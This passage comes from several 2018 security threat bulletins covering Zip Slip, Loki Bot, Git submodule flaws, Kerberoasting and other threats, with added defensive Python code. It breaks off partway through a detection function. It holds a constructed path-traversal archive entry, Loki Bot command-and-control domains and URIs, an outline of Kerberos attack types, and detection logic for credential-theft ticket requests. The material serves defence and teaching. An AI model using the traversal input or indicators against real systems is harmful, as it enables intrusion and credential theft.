    Zip Slip has been found on the following platforms:

    • Java: It is very prevalent here because Java has no central library that offers high-level processing of archive files.
    • JavaScript
    • Ruby
    • .NET
    • Go

    Attackers will target a site that will allow them to upload zip files, and then create malicious versions of the kinds of files that they would like to overwrite. It is even possible for an attacker to attach a zip file to an email, with the malicious file targeting a common location of a Windows desktop.

    Recommendations

    Like many software bugs, the usual fix is a simple patch. The GitHub list linked below tracks projects and libraries with known Zip Slip vulnerabilities; peruse it to see whether you are using any of them, as updates are available for most entries. We also recommend the following:

    • Projects and libraries with known Zip Slip vulnerabilities: https://github.com/snyk/zip-slip-vulnerability
    • If you maintain software that unzips files automatically, test it to see whether it is vulnerable.
    • Consider whether standard libraries would be a better option for your organization.
    • Check that your applications operate in accordance with the principle of least privilege.
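
    The test recommended above amounts to one question: does the extractor let an entry name climb out of the destination directory? The following added example (not code from the bulletin or from any of the listed projects) builds a small archive in memory with a constructed `../../etc/evil.conf` entry beside a harmless one, then shows an extraction routine that resolves every entry against the destination and refuses anything that lands outside it. The destination path `/tmp/extract` and the entry names are assumptions for the demonstration.

```python
import io
import os
import zipfile

# Constructed sample archive contents (not from the bulletin): one benign entry
# and one Zip Slip style entry whose name climbs out of the extraction folder.
SAMPLE_ENTRIES = {
    "docs/readme.txt": b"harmless content\n",
    "../../etc/evil.conf": b"would overwrite something outside the target dir\n",
}


def build_sample_zip(entries=SAMPLE_ENTRIES):
    """Return the bytes of an in-memory zip archive holding `entries`.
    zipfile does not sanitise names on write, so the traversal entry survives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def is_within(base, target):
    """True when `target`, fully resolved, lies inside the resolved `base`."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def classify_entries(zip_bytes, dest_dir="/tmp/extract"):
    """Split archive entries into (safe, rejected) lists without writing anything.

    An entry is rejected when it is absolute, carries a drive letter, or when
    dest_dir joined with the entry name resolves to a path outside dest_dir.
    """
    safe, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            target = os.path.join(dest_dir, name)
            if os.path.isabs(name) or os.path.splitdrive(name)[0] or not is_within(dest_dir, target):
                rejected.append(name)
            else:
                safe.append(name)
    return safe, rejected


def safe_extract(zip_bytes, dest_dir):
    """Extract only the entries that stay inside dest_dir; return written paths."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest_dir, info.filename)
            if os.path.isabs(info.filename) or not is_within(dest_dir, target):
                continue  # traversal attempt: skip it rather than overwrite a file
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


if __name__ == "__main__":
    safe, rejected = classify_entries(build_sample_zip())
    print("safe:", safe)
    print("rejected:", rejected)
```

    The check is done on the resolved path, not by looking for the literal string `..`, so encoded or platform-specific variants are caught the same way. Python's own `ZipFile.extract` strips such components, but many of the libraries on the linked list did not, which is exactly why the bulletin recommends testing your unzip path rather than assuming.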

    2. Password Reset Flaw

    Overview

    Large cable and internet provider, , has a bug in the way they reset account passwords for their customers. The bug would allow anyone to take over a user’s account. An attacker with some determination and a few hours of their time would be able to take over a customer account with just a username and email address.

    The attacker can bypass the access code sent during the reset process by exploiting a small flaw: the access code field is not rate limited, allowing any number of attempts. Using an automated network intercept tool, the attacker could try as many as 100 codes in 10 seconds, eventually unlocking the account.

    Recommendations

    The service has since been shut down, and a patch is likely to follow. Once the patch becomes available, apply the fix as soon as possible. We also recommend using different methods of multifactor authentication (MFA); MFA can be a text message or even an application that approves or denies each sign-in request.
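
    The flaw above is the absence of an attempt budget on the access code. The following added example (not code from the provider described or from the bulletin) shows what a reset-code check looks like with that budget in place: each code is random, single use, expires, and is invalidated after a fixed number of wrong guesses, so a hundred guesses in ten seconds get five checks and then nothing. The code length, attempt limit, lifetime, and the in-memory store are assumptions chosen for the demonstration.

```python
import hmac
import secrets
import time

CODE_LENGTH = 6          # digits in the access code
MAX_ATTEMPTS = 5         # wrong guesses allowed before the code is invalidated
CODE_TTL_SECONDS = 600   # lifetime of a code


class ResetCodeStore:
    """In-memory store of pending reset codes keyed by account (constructed example).
    A real deployment would back this with a database or cache, but the rules are the same."""

    def __init__(self, clock=time.time):
        self._clock = clock   # injectable clock so expiry can be tested deterministically
        self._pending = {}    # account -> {"code": str, "expires": float, "attempts": int}

    def issue(self, account):
        """Generate a fresh random numeric code for `account` and return it so the
        caller can deliver it out of band (SMS, e-mail). Any earlier code is replaced."""
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_LENGTH))
        self._pending[account] = {
            "code": code,
            "expires": self._clock() + CODE_TTL_SECONDS,
            "attempts": 0,
        }
        return code

    def has_pending(self, account):
        return account in self._pending

    def verify(self, account, submitted):
        """Return True only for a correct, unexpired code within the attempt budget.

        Every call consumes one attempt. When the budget is spent, or the code has
        expired, the code is discarded and the user must request a new one. That is
        the control missing from the reset flow described above.
        """
        entry = self._pending.get(account)
        if entry is None:
            return False
        if self._clock() > entry["expires"]:
            del self._pending[account]
            return False
        entry["attempts"] += 1
        ok = hmac.compare_digest(entry["code"], str(submitted))  # constant-time compare
        if ok or entry["attempts"] >= MAX_ATTEMPTS:
            del self._pending[account]  # single use on success; locked out on exhaustion
        return ok


def guesses_checked_before_lockout(store, account, guesses):
    """Feed wrong guesses in order and count how many the store still evaluates."""
    checked = 0
    for guess in guesses:
        if not store.has_pending(account):
            break
        store.verify(account, guess)
        checked += 1
    return checked


if __name__ == "__main__":
    store = ResetCodeStore()
    code = store.issue("demo-account")
    # Simulate the 100-guess burst from the write-up: only MAX_ATTEMPTS are evaluated.
    burst = [f"{i:06d}" for i in range(100) if f"{i:06d}" != code]
    print("guesses evaluated:", guesses_checked_before_lockout(store, "demo-account", burst))
```

    Two details matter beyond the counter itself: the comparison is constant time so the response does not leak how many digits matched, and a wrong guess on an expired or locked code is indistinguishable from a wrong guess on a live one.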

    3. Loki Bot Malware

    Overview

    Malware known as Loki Bot attempts to steal login credentials from infected users and sends the data and other sensitive material from the infected Windows host to a command and control (C2) server. Loki Bot is commonly distributed through malicious spam (malspam). The malware typically arrives as an RTF attachment disguised as a Word document. When the file is opened with a vulnerable version of Microsoft Office, the malware is downloaded and Loki Bot is installed. Once installed, Loki Bot steals usernames, passwords, and other sensitive data from the Windows host.

    Recommendations

    The most effective defense against this threat is to make sure all updates and patches are applied to your Windows system(s); poor system upkeep is the main opening this threat needs in order to exploit a vulnerability. The following are also some indicators of the malware:

    Indicators are not the same as a block list.  If you need to block the associated web traffic, block anything going to these two domains:

    • com
    • service-sbullet.com

    Information from the malicious spam:

    • Date: Sunday, 11 Jun 2018 01:05 UTC
    • From: “Gold Link Logistics” <c37120b2324@fb90cfa11840.tr>
    • Subject: Re: Aw: Aw: Shipping Documents
    • Attachment Name: shipping documents.doc

    Traffic from an infected Windows host:

    • 163.221.2 TCP port 443 (HTTPS) – service-sbullet.com – GET /images/mg2/m.exe
    • 122.138.6 TCP port 80 (HTTP) – oceanlinkmarrine.com – POST /loki4/fre.php

    Associated malware:

    SHA256 hash: b66d5b28c57517b8b7d2751e30e5175149479e5fde086b293a016aac11cdd546

    • File size: 7,347 bytes
    • File name: shipping documents.doc
    • File description: RTF exploiting CVE-2017-11882 disguised as a Word document

    SHA256 hash: a747eeac9ae8ee9317871dfaa2a368f2e82894f601a90614da5818f8f91d1d78

    • File size: 667,648 bytes
    • File location: hxxp://service-sbullet.com/images/mg2/m.exe
    • File description: Windows executable file for Lokibot

    System administrators can also implement Microsoft’s best practices when it comes to software restriction policies. https://docs.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies-technical-overview
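
    The indicators listed above are most useful when matched against what your proxy or web gateway has already logged. The following added example (not code from the bulletin) takes the two domains, the two request URIs and the two SHA256 hashes from the section above and runs them over a few constructed proxy log lines. The log format (timestamp, client, method, host, path, status) and the client addresses are assumptions for the demonstration; the indicator values themselves are the ones given above.

```python
import re

# Indicators taken from the bulletin's Loki Bot section.
IOC_DOMAINS = {"service-sbullet.com", "oceanlinkmarrine.com"}
IOC_REQUESTS = {("GET", "/images/mg2/m.exe"), ("POST", "/loki4/fre.php")}
IOC_SHA256 = {
    "b66d5b28c57517b8b7d2751e30e5175149479e5fde086b293a016aac11cdd546",
    "a747eeac9ae8ee9317871dfaa2a368f2e82894f601a90614da5818f8f91d1d78",
}

# Constructed proxy log lines (not real traffic). Fields are space separated:
# timestamp client method host path status
SAMPLE_LOG = """\
2018-06-11T01:07:12Z 10.0.0.15 GET service-sbullet.com /images/mg2/m.exe 200
2018-06-11T01:07:40Z 10.0.0.15 POST oceanlinkmarrine.com /loki4/fre.php 200
2018-06-11T01:08:02Z 10.0.0.22 GET www.example.com /index.html 200
2018-06-11T01:09:55Z 10.0.0.31 GET cdn.service-sbullet.com /favicon.ico 404
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


def host_matches(host, domains=IOC_DOMAINS):
    """Match the domain itself or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def match_log(text):
    """Return one record per log line that touches a Loki Bot indicator, with the
    reasons it matched ('domain', 'uri' or both). Unparseable lines are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        reasons = []
        if host_matches(m["host"]):
            reasons.append("domain")
        if (m["method"], m["path"]) in IOC_REQUESTS:
            reasons.append("uri")
        if reasons:
            hits.append({
                "ts": m["ts"],
                "client": m["client"],
                "host": m["host"].lower(),
                "path": m["path"],
                "reasons": reasons,
            })
    return hits


def match_hashes(observed):
    """Return the observed SHA256 values (case-insensitive) that are known Loki Bot samples."""
    return sorted(h.lower() for h in observed if h.lower() in IOC_SHA256)


def clients_to_investigate(text):
    """Distinct internal hosts that talked to any indicator; these are the machines to pull for triage."""
    return sorted({h["client"] for h in match_log(text)})


if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG):
        print(hit)
    print("investigate:", clients_to_investigate(SAMPLE_LOG))
```

    As the bulletin notes, indicators are not a block list: the fourth line matches on domain alone and would need a look at what the host actually fetched before anything is blocked, while the first two match on both domain and URI and point straight at the download and the credential POST.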

    4. MitM Chrome Extension

    Overview

    A malicious Chrome extension known as Desbloquear Conteúdo (Unblock Content) targeted Brazilian online banking services. The goal of the malicious extension is to accumulate stolen user logins and passwords, allowing the attackers to steal money from the victims’ bank accounts. While most of our users are not in Brazil, the threat of malicious extensions is ever present globally.

    This is not the first time that Chrome has been found with bad extensions wanting to steal user information and data (Nyoogle, Lite Bookmarks, Stickies, etc.). In fact, over 500,000 users were affected by the ones that were just mentioned, which is why it is incredibly important to be vigilant and careful of the extensions that you use.

    Recommendations

    Browser extensions designed to steal logins and passwords are more than feasible, and they should be taken seriously. We recommend discontinuing the use of such extensions if at all possible, however business needs may arise to which they are required. If you must use extensions:

    • Have a good antivirus solution (like Symantec) that is up to date and can check for suspicious activity regarding newly installed extensions.
    • Perform routine patches and updates. Often, malicious extensions require some sort of open vulnerability in a system to activate. Stay current.
    • Only install verified extensions with large numbers of installations and reviews in the Chrome Web Store.
    • Avoid third-party extensions as their validity cannot always be determined.

    5. MyHeritage Breach

    Overview

    The breach was discovered when a security researcher found an archive on a third-party server containing the personal details of 92,283,889 MyHeritage users. The archive contained only emails and hashed passwords, but not payment card details or DNA test results. MyHeritage says it uses third-party payment processors for financial operations, meaning payment data was never stored on its systems, while DNA test results were saved on separate servers from the one that managed user accounts.

    The company also promised to roll out a two-factor authentication (2FA) feature for user accounts, so even if the hacker manages to crack the hashed passwords, these would be useless without the second-step verification code.

    It goes without saying that MyHeritage users should change their passwords as soon as possible.

    The MyHeritage incident marks the biggest data breach of the year and the biggest leak since last year’s Equifax hack.

    Recommendations

    This breach is a reminder of the importance of using a different password for every online account. While the plaintext password for each account was not revealed, a hash can be cracked to recover the original password. Since the email addresses for the accounts were revealed, there is a chance an adversary could try the recovered password with the email on other sites, hoping to log in successfully.

    • MyHeritage is only now adopting two-factor authentication (2FA); users should always make use of this feature wherever possible.
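
    Whether a leaked hash can be turned back into a password depends mostly on how it was produced. The following added example (not code from MyHeritage or from the bulletin) puts a fast unsalted digest beside a salted, memory-hard scheme using constructed sample accounts: with the weak scheme, two users who chose the same password produce the same hash, so a single cracked value or precomputed table covers both; with a per-user salt and scrypt, the stored values differ and each guess costs real work. The scrypt parameters and the `scrypt$salt$hash` storage format are assumptions for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed sample accounts (not data from the breach): two users share a password.
SAMPLE_USERS = {
    "alice@example.com": "Summer2018!",
    "bob@example.com": "Summer2018!",
    "carol@example.com": "correct horse battery staple",
}

# scrypt work factor: 128 * n * r bytes of memory (16 MiB here) for every guess.
SCRYPT_PARAMS = {"n": 2 ** 14, "r": 8, "p": 1}


def unsalted_sha256(password):
    """The weak scheme: a fast, unsalted digest. Equal passwords give equal hashes,
    so one cracked hash or one lookup table covers every account that chose it."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None):
    """The hardened scheme: random per-user salt plus a memory-hard KDF.
    Returns 'scrypt$<salt hex>$<digest hex>' so the salt travels with the hash."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, dklen=32, **SCRYPT_PARAMS)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "scrypt":
        return False
    digest = hashlib.scrypt(
        password.encode("utf-8"), salt=bytes.fromhex(salt_hex), dklen=32, **SCRYPT_PARAMS
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def shared_hash_groups(stored_by_account):
    """Return groups (sorted account lists) whose stored hashes are byte-identical.
    A non-empty result means the scheme reveals which users share a password."""
    by_hash = {}
    for account, stored in stored_by_account.items():
        by_hash.setdefault(stored, []).append(account)
    return sorted(sorted(group) for group in by_hash.values() if len(group) > 1)


if __name__ == "__main__":
    weak = {u: unsalted_sha256(p) for u, p in SAMPLE_USERS.items()}
    strong = {u: hash_password(p) for u, p in SAMPLE_USERS.items()}
    print("shared hashes, unsalted sha256:", shared_hash_groups(weak))
    print("shared hashes, salted scrypt:  ", shared_hash_groups(strong))
```

    The second point the recommendation makes, reuse across sites, is not something the hashing scheme can fix: a password that is cracked here still unlocks every other site where it was reused, which is why the per-account password advice stands regardless of how well the hashes were protected.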

  • Netizen Threat Brief: 6 June 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Misconfigured Google Groups
    2. Git Bug
    3. Rental Car PII Risk
    4. JScript Bug

    1. Misconfigured Google Groups

    Overview

    Thousands of organizations have been discovered to be leaking sensitive data due to a widespread misconfiguration in Google Groups. Those afflicted include Fortune 500 companies, hospitals, colleges, newspapers, TV stations, and even government agencies.

    Google Groups is a web forum that allows administrators to create mailing lists for specific recipients, and they are able to adjust privacy settings with respect to domains and certain groups. This forum is made available online to users. Many groups are visible to the Internet, and the ability to share outside of the organization is left open.

    Recommendations

    While this is a misconfiguration issue, Google has not issued any special sort of update or patch. The following link should be used for admins to lock down their google groups: https://gsuiteupdates.googleblog.com/2018/06/configure-your-google-groups-settings.html

    Permissions and outside access for users should be limited to the scope of the organization and to how it conducts its business.

    2. Git Bug

    Overview

    Popular Git repository hosting services such as GitHub, GitLab, and MS VSTS were discovered to have two bugs that would allow an attacker to perform arbitrary code execution. An attacker would be able to gain access when a user, or developer, accesses a malicious repository. The more serious of the two is described as a submodule configuration flaw: submodules can be malicious and directed to execute code. Submodules are used to reference one repository from within another in an almost hierarchical way. Essentially, submodules allow a developer to keep a Git repository as a subdirectory of another Git repository, letting you clone another repository into your project.

    The main concern with the Git vulnerabilities is that a malicious or rogue submodule will trick the repository into running code that is out of its own context (code that it should not be running). This arbitrary execution could allow an attacker to exfiltrate data, pull down a web shell, plant a cryptominer, or even take complete control over the machine that the repository or clone is being run on.

    Recommendations

    While the aforementioned repository hosting services have patched the vulnerabilities, there are still some best practices to follow with git repos:

    • A Git repository should not contain “..” as a path segment.
    • Examine submodule folders more closely for flaws and inaccuracies.
    • Submodule folders should not be symbolic links.
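
    The three rules above can be checked mechanically before a submodule is initialised. The following added example (not code from Git or from the bulletin) parses a constructed `.gitmodules` file and reports any submodule whose name or path contains a `..` segment, is absolute, or, when a checkout directory is supplied, points at a symbolic link. The sample submodule names and URLs are assumptions for the demonstration; the checks follow the bulletin's best practices rather than Git's own internal validation.

```python
import os
import re
import tempfile

SECTION_RE = re.compile(r'^\s*\[submodule\s+"(?P<name>[^"]*)"\]\s*$')
KV_RE = re.compile(r'^\s*(?P<key>[A-Za-z]+)\s*=\s*(?P<value>.*?)\s*$')

# Constructed .gitmodules content (not from any real repository): one sane
# submodule and two that break the rules listed above.
SAMPLE_GITMODULES = """\
[submodule "libs/good"]
\tpath = libs/good
\turl = https://example.invalid/good.git
[submodule "../escape"]
\tpath = ../escape
\turl = https://example.invalid/escape.git
[submodule "tricky"]
\tpath = libs/../../tricky
\turl = https://example.invalid/tricky.git
"""


def parse_gitmodules(text):
    """Minimal .gitmodules parser: {submodule name: {key: value}}."""
    modules, current = {}, None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            current = m["name"]
            modules[current] = {}
            continue
        m = KV_RE.match(line)
        if m and current is not None:
            modules[current][m["key"].lower()] = m["value"]
    return modules


def has_dotdot_segment(path):
    """True when any segment of the slash- or backslash-separated path is '..'."""
    return ".." in path.replace("\\", "/").split("/")


def audit_submodules(text, repo_root=None):
    """Return (name, problem) pairs for every rule violation in a .gitmodules file.

    Checks the submodule name and path for '..' segments, rejects absolute paths,
    and, when repo_root is given, flags a submodule path that is a symlink on disk.
    """
    problems = []
    for name, cfg in parse_gitmodules(text).items():
        path = cfg.get("path", name)
        if has_dotdot_segment(name):
            problems.append((name, "name contains a '..' segment"))
        if has_dotdot_segment(path):
            problems.append((name, "path contains a '..' segment"))
        if path.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", path):
            problems.append((name, "path is absolute"))
        if repo_root is not None and os.path.islink(os.path.join(repo_root, path)):
            problems.append((name, "path is a symbolic link"))
    return problems


def demo_repo_with_symlink():
    """Create a throwaway directory in which libs/good is a symlink, to exercise the last check."""
    root = tempfile.mkdtemp(prefix="gitmodules-audit-")
    os.makedirs(os.path.join(root, "libs"))
    os.makedirs(os.path.join(root, "real_target"))
    os.symlink(os.path.join(root, "real_target"), os.path.join(root, "libs", "good"))
    return root


if __name__ == "__main__":
    for name, problem in audit_submodules(SAMPLE_GITMODULES, demo_repo_with_symlink()):
        print(f"{name}: {problem}")
```

    Run against a repository before `git submodule update --init`, the audit turns the bulletin's checklist into a gate: the `tricky` entry shows why the test must split the path into segments rather than look only at its start, since `libs/../../tricky` begins innocently and still climbs out of the repository.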

    3. Rental Car PII Risk

    Overview

    Rental cars now pose a real threat to Personally Identifiable Information (PII). It is common for people to connect their smart phones to their car, either through Bluetooth or USB cable, to either play music, make a phone call, or charge their battery. This common habit, however, may result in the download and retention of your PII. The smart system within the car may store the cellphone number, your location data, and may also store call logs and contacts that have been previously dialed or texted.

    Recommendations

    Before returning your rental, we recommend the following to protect your PII:

    • A USB connection may transfer data automatically; use a cigarette lighter adapter instead to power and charge devices.
    • If your rental car is equipped, grant access to just the information you want to reveal by using the rental car’s permission screen.
    • Delete your PII from the car’s system. There should be an option to remove your phone from the list of paired devices, which should wipe call logs and remove contacts.
    • Remember to erase your location history from the car’s navigation system by entering the settings and clearing your driving record.
    • Your rental car may have an option to clear all user data or do a factory reset. Talk to a staff member or check online before you drive away in your rental, since you may forget or be in a hurry at the end of your trip.

    4. JScript Bug

    Overview

    Microsoft’s custom implementation of JavaScript, known as JScript, can be exploited to allow an attacker to execute malicious code remotely on a victim’s PC. Because the vulnerability is within JScript, the attacker must trick a user into accessing a malicious web page, or into downloading and opening a malicious JS file on the system, which is then run by Windows Script Host (wscript.exe).

    It should also be noted that this vulnerability does not lead to full system compromise; further exploits would be required to advance exploitation. However, information accessed on the right computer, like that of a CEO, could be disastrous for a company.

    Recommendations

    Microsoft is currently working on a patch; however, there are preventative measures that can be taken. We recommend discontinuing, where feasible, the use of applications that rely on JScript, including Internet Explorer, wscript.exe, and others that process untrusted JS code or files. Users should also be aware of:

    • Malicious email attachments
    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email—this is a huge red flag.

  • Netizen Threat Brief: 30 May 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. BackSwap Trojan
    2. Z-Shave

    1. BackSwap Trojan

    Overview

    A stealthy banking malware known as the BackSwap Trojan is being used to empty victims’ bank accounts right from their web browser. The success of this malware relies on its ability to remain undetected by security solutions: BackSwap abstains from the usual process injection for monitoring browser activity and instead works with Windows GUI elements and simulates user input.

    BackSwap monitors the URLs being visited and, once it detects bank-specific activity, injects malicious code, in this case JavaScript, either into the JavaScript console or directly into the address bar. BackSwap is also able to circumvent several defenses and counters that browsers often implement to prevent this kind of exploitation.

    Recommendations

    The injected JavaScript replaces the bank account number entered by the victim with that of a false account created by the hackers. If the victim does not notice the swap and authorizes the transaction, the attack succeeds. BackSwap is delivered through spam, malicious attachments, and phishing emails. We recommend the following:

    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email—this is a huge red flag.
    • Do not give out personal or company information.
    • Review both signature and salutation.
    • Do not click on attachments.

    Be wary of poor spelling, grammar, and formatting. As can be seen with the Dropbox phishing email, there are multiple spelling, grammar, and formatting errors, leading us to believe that the message is illegitimate. If an email is visually unprofessional, the sender is likely not who they say they are.

    2. Z-Shave

    Overview

    The wireless communications protocol known as Z-Wave has been found to be vulnerable to a downgrade attack, which allows an attacker to intercept and tamper with traffic in transit between smart devices. The attack, known as Z-Shave, works by tricking two smart devices that are pairing with one another into thinking that one of them does not support the newer Z-Wave S2 security features, forcing the two devices to fall back to the older, more vulnerable security standard. The exploitation can be a gateway for attackers into the organization’s larger network.

    Z-Wave is very popular among Internet of Things (IoT) devices because its range of up to 100 meters far exceeds Bluetooth’s. It is currently estimated that Z-Wave runs on over 100 million IoT devices.

    Recommendations

    The most prominent recommendation we can provide, if utilizing Z-Wave on your IoT devices, is to upgrade and switch to the newest and most secure version of the protocol. We also recommend the following mitigations and strategies for securing IoT devices:

    • Identify all IoT devices on the network, no matter how long they have been there. You cannot protect what you don’t know is there.
    • Data flows should be documented to ascertain what is needed and what is unnecessary and does not add value. With this knowledge, the network can be segmented appropriately—firewalling off any unneeded traffic.
    • Control the acquisition and implementation process—smart tv’s, fridges, etc. could open subtle channels for attackers to use to gain entry inside of the network. This happened in the well-known Target breach several years ago where a smart refrigerator was used to inject malware into the network and steal credit card numbers.
    • Perform regular vulnerability assessments on internal and external networks to reveal any hidden weaknesses or openings into the environment. These risks should then be reviewed at regular intervals, implementing mitigation strategies as feasible.
    • Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.

  • Netizen Threat Brief: 23 May 2018 Edition

    Threats:

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. DNS-Hijacking Malware
    2. Kerberoasting
    3. Mirai Botnet Evolved
    4. Misconfigured Reverse Proxy Servers
    5. Layered Backup Security to Combat Ransomware

    1. DNS-Hijacking Malware

    Overview

    A new DNS-hijacking malware known as Roaming Mantis is being utilized to target Android devices, as well as iOS devices. The malware was initially found to hijack internet routers to distribute banking malware that would steal a user’s login credentials as well as the secret code used for multifactor authentication (MFA). In addition to Android targets, Roaming Mantis has begun phishing attacks for iOS devices and a cryptocurrency mining script for PC users.

    The DNS hijacking takes place when the hacker changes the DNS settings of the wireless routers to redirect traffic to malicious websites controlled by the hackers themselves. These malicious websites serve:

    • Fake apps infected with banking malware to Android users,
    • Phishing sites to iOS users,
    • Sites with cryptocurrency mining scripts to desktop users

    Recommendations

    We recommend the following strategies to mitigate or prevent a breach:

    • Ensure that your router is operating at its latest firmware version and protected with a strong and complex password.
    • If at all possible, disable the router’s ability for remote administration. It would also be useful to hardcode a trusted DNS server into the OS network settings.
    • Android users should install apps from official stores and disable the installation of applications from unknown sources.
    • Perform routinely scheduled DNS settings checks of the DNS server address. If the DNS address does not match one you have specifically set or one from your provider, change it back to the appropriate one and change all account passwords immediately.

    2. Kerberoasting

    Overview

    Kerberoasting is an effective method for extracting service account credentials from Active Directory as a regular user, without sending any packets to the target system. The method is especially effective against accounts that use poor passwords. The attack itself abuses a popular authentication protocol used on Windows, known as Kerberos.

    There are several different types of Kerberos attacks ranging from recon (SPN Scanning), to offline service account password cracking (Kerberoast), to persistence (Silver & Golden Tickets). The vulnerability surfaces due to Microsoft’s legacy support in Active Directory for older systems and protocols (Windows NT, RC4 Kerberos, etc.).

    Here are the most popular AD Kerberos attacks:

    • SPN Scanning – finding services by requesting service principal names of a specific SPN class/type.
    • Silver Ticket – forged Kerberos TGS service ticket
    • Golden Ticket – forged Kerberos TGT authentication ticket
    • MS14-068 Forged PAC Exploit – exploitation of the Kerberos vulnerability on Domain Controllers.
    • Diamond PAC – blended attack type using elements of the Golden Ticket and the MS14-068 forged PAC.
    • Skeleton Key In-memory Malware – malware “patches” the LSASS authentication process in memory on Domain Controllers to enable a second, valid “skeleton key” password which can be used to authenticate as any domain account.

    Recommendations

    To protect yourself from being Kerberoasted, we recommend the following:

    • Enforce strong passwords. Poor passwords are the root cause of Kerberoasting. Strong passwords should especially be enforced for service accounts associated with SPNs.
    • Utilize Microsoft’s “Managed Service accounts”. These types of accounts will automatically change passwords at determined intervals, lowering the usefulness of any cracked passwords.
    • Employ endpoint protection in addition to having an up to date antivirus agent.
    • Implement network monitoring for Kerberoasting attacks, such as scheduled vulnerability scanning.
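
    The monitoring recommended in the last point has a concrete signal to work from: Kerberoasting shows up on the domain controller as service ticket requests (Event ID 4769) that ask for the legacy RC4-HMAC encryption type (0x17, the legacy support the overview mentions), typically several in quick succession from one account. The following added example (not code from the bulletin or from any vendor product) runs that logic over constructed 4769 records in JSON lines form, filtering out computer accounts and krbtgt and alerting when one requester obtains several distinct RC4 tickets within a short window. The record format, account names, addresses, window and threshold are assumptions for the demonstration.

```python
import json
from datetime import datetime, timedelta

RC4_HMAC = "0x17"             # TicketEncryptionType for RC4-HMAC, the crackable legacy type
WINDOW = timedelta(minutes=5)
THRESHOLD = 3                 # distinct RC4 service tickets per account per window

# Constructed Event ID 4769/4768 records as JSON lines (not from a real domain controller).
SAMPLE_EVENTS = """\
{"TimeCreated": "2018-05-20T14:01:05Z", "EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.1.2.3"}
{"TimeCreated": "2018-05-20T14:01:06Z", "EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.1.2.3"}
{"TimeCreated": "2018-05-20T14:01:07Z", "EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.1.2.3"}
{"TimeCreated": "2018-05-20T14:01:08Z", "EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.1.2.3"}
{"TimeCreated": "2018-05-20T14:02:00Z", "EventID": 4769, "TargetUserName": "asmith@CORP.EXAMPLE", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.1.9.9"}
{"TimeCreated": "2018-05-20T14:02:30Z", "EventID": 4769, "TargetUserName": "asmith@CORP.EXAMPLE", "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.1.9.9"}
{"TimeCreated": "2018-05-20T14:03:00Z", "EventID": 4768, "TargetUserName": "asmith@CORP.EXAMPLE", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.1.9.9"}
"""


def parse_events(text):
    """Parse JSON lines into dicts, adding a parsed datetime under '_time'."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["_time"] = datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events


def rc4_service_ticket_requests(text):
    """Successful 4769s for RC4 tickets to user-style service accounts.

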